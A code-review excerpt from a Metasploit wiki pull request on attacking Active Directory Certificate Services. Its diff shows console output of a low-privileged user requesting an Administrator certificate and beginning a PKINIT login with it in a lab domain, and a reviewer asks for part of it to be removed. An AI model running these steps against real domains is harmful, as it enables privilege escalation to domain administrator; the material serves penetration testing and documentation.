docs/metasploit-framework.wiki/Attacking-ADCS-ESC-Vulnerabilities.md

```diff
@@ -0,0 +1,931 @@
+   SMBDomain      DAFOREST                        no        The Windows domain to use for authentication
+   SMBPass        normaluser                      no        The password for the specified username
+   SMBUser        normal                          no        The username to authenticate as
+
+
+Auxiliary action:
+
+   Name          Description
+   ----          -----------
+   REQUEST_CERT  Request a certificate
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(admin/dcerpc/icpr_cert) > run
+[*] Running module against 172.30.239.85
+
+[*] 172.30.239.85:445 - Requesting a certificate...
+[+] 172.30.239.85:445 - The requested certificate was issued.
+[*] 172.30.239.85:445 - Certificate UPN: Administrator@daforest.com
+[*] 172.30.239.85:445 - Certificate SID: S-1-5-21-3290009963-1772292745-3260174523-500
+[*] 172.30.239.85:445 - Certificate stored at: /home/gwillcox/.msf4/loot/20221216155701_default_unknown_windows.ad.cs_756798.pfx
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/dcerpc/icpr_cert) > loot
+
+Loot
+====
+
+host  service  type           name             content               info                         path
+----  -------  ----           ----             -------               ----                         ----
+               windows.ad.cs  certificate.pfx  application/x-pkcs12  DAFOREST\normal Certificate  /home/gwillcox/.msf4/loot/20221216154930_default_unknown_windows.ad.cs_104207.pfx
+               windows.ad.cs  certificate.pfx  application/x-pkcs12  DAFOREST\normal Certificate  /home/gwillcox/.msf4/loot/20221216155701_default_unknown_windows.ad.cs_756798.pfx
+
+msf6 auxiliary(admin/dcerpc/icpr_cert) >
+```
+
+Finally we can use the `pkinit_login` module to log in to the domain as `Administrator@daforest.com` using the new PFX file:
+
+```
+msf6 auxiliary(admin/dcerpc/icpr_cert) > use pkinit_login
+
+Matching Modules
+================
+
+   #  Name                                   Disclosure Date  Rank    Check  Description
+   -  ----                                   ---------------  ----    -----  -----------
+   0  auxiliary/admin/kerberos/pkinit_login                   normal  No     Kerberos Authentication Check Scanner
+
+
+Interact with a module by name or index. For example info 0, use 0 or use auxiliary/admin/kerberos/pkinit_login
+
+[*] Using auxiliary/admin/kerberos/pkinit_login
+msf6 auxiliary(admin/kerberos/pkinit_login) > set RHOSTS 172.30.239.85
+RHOSTS => 172.30.239.85
+msf6 auxiliary(admin/kerberos/pkinit_login) > set
+set ACTION             set LogLevel           set PromptTimeFormat   set Timeout
+set CERT_FILE          set MeterpreterPrompt  set RHOSTS             set TimestampOutput
+set CERT_PASS          set MinimumRank        set RPORT              set USERNAME
+set ConsoleLogging     set Prompt             set SessionLogging     set VERBOSE
+set DOMAIN             set PromptChar         set SessionTlvLogging  set WORKSPACE
```

Comment:
This can be removed.

Reply:
Removed in https://github.com/rapid7/metasploit-framework/pull/17399/commits/239bc42f4c4228a21dd726e08fa3273545112f7f